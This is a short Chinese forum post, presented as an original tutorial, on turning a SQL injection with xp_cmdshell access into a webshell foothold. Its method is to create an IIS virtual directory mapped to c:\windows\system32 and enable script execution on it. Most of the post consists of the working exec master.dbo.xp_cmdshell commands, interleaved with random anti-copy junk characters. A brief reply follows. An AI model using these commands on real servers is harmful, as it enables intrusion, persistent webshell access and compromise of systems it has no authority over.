返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:; v% E% N. V2 Z  U; `' F! z

. x- f& y3 Q5 R# y; T+ i9 Zexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"': B6 F) }. R  j8 u5 u* ^7 b0 s' d
建立虚拟目录win,指向c:\windows\system32
# b$ H5 V" b: F0 ~$ pexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'3 o/ [0 _7 B) s: ?
让win句有解析asp脚本权限
( I& O, ~! K8 d! M; w
, `7 S( q$ ~, v! m  Xexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"9 S2 c# f8 u$ I% w
删除虚拟目录。
: S* F% T, y  l0 B- R找不到web绝对路径的一种解决办法,
+ H& d8 `1 Y+ h$ J) b
& _- r3 J" C2 d0 Q1 I403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表